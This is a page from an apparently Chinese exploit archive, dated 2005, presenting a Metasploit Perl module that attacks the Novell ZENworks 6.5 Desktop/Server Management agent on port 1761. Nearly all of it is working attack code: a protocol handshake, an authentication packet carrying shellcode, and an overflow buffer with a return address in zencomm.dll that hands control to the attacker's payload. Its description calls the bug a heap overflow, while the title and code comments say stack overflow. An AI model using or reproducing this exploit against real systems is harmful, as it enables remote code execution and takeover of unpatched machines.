首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

ZENworks 6.5 Desktop/Server Management Remote Stack Overflow


http://www.gipsky.com/
#

#



package Msf::Exploit::zenworks_desktop_agent;

use strict;

use base "Msf::Exploit";

use Pex::Text;



my $advanced = { };



my $info =

{

'Name' => 'ZENworks 6.5 Desktop/Server Management Remote Stack Overflow',

'Version' => '$Revision: 1.1 $',

'Authors' =>

[

'Anonymous',

],

'Arch' => [ 'x86' ],

'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ],

'Priv' => 1,



'UserOpts' =>

{

'RHOST' => [1, 'ADDR', 'The target address'],

'RPORT' => [1, 'PORT', 'The target port', 1761 ],

},



'Payload' =>

{

'Space' => 0x7FFF,

'BadChars' => "\x00",

'Keys' => [' ws2ord'],

},



'Description' => Pex::Text::Freeform(qq{

This module exploits a heap overflow in the Novell ZENworks

Desktop Management agent.

}),



'Refs' =>

[

['BID', 13678],

],



'Targets' =>

[

[ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', 0x10002e06]

],



'Keys' => ['zenworks'],

};



sub new {

my $class = shift;

my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);

return($self);

}



sub Exploit {

my $self = shift;

my $target_host = $self->GetVar('RHOST');

my $target_port = $self->GetVar('RPORT');

my $target_idx = $self->GetVar('TARGET');

my $shellcode = $self->GetVar('EncodedPayload')->Payload;

my $target = $self->Targets->[$target_idx];



$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );



my $s = Msf::Socket::Tcp->new(

'PeerAddr' => $target_host,

'PeerPort' => $target_port,

'LocalPort' => $self->GetVar('CPORT'),

);



if ( $s->IsError ) {

$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );

return;

}



my $req = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77";

$self->PrintLine( "[*] Sending version identication" );

$s->Send($req);



my $ident = $s->Recv(-1, 16);

if (length($ident) != 16)

{

$self->PrintLine( "[*] Failed to receive agent version identication" );

return;

}

else

{

$self->PrintLine( "[*] Received agent version identication" );

}



$req = "\x00\x01";

$self->PrintLine( "[*] Sending client acknowledgment" );

$s->Send($req);



# stack overflow in ZenRem32.exe / ZENworks Server Management



$req = "\x00\x06metmet\x00\x06metmet\x7F\xFF" . $shellcode . "\x00\x01";

$self->PrintLine( "[*] Sending authentication data (including shellcode)" );

$s->Send($req);



$s->Recv(2, 2);

$s->Send("\x00\x01");



#$s->Recv(2, 2);

#my $len = $s->Recv(2,2);

#$len = unpack ('n', $len);

#$s->Recv($len, $len);



$s->Send("\x00\x02");



$self->PrintLine( "[*] Sending final payload" );



# pop/pop/pop/pop/pop/ret in zencomm.dll on our shellcode

my $crash = "A" x 0x20;

$req = "\x00\x24" . $crash . pack('V', $target->[1]);

$s->Send($req);



$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");

select(undef, undef, undef, 4);



$self->Handler($s);

return;

}



1;

[2005-08-12]
<< MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039) MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号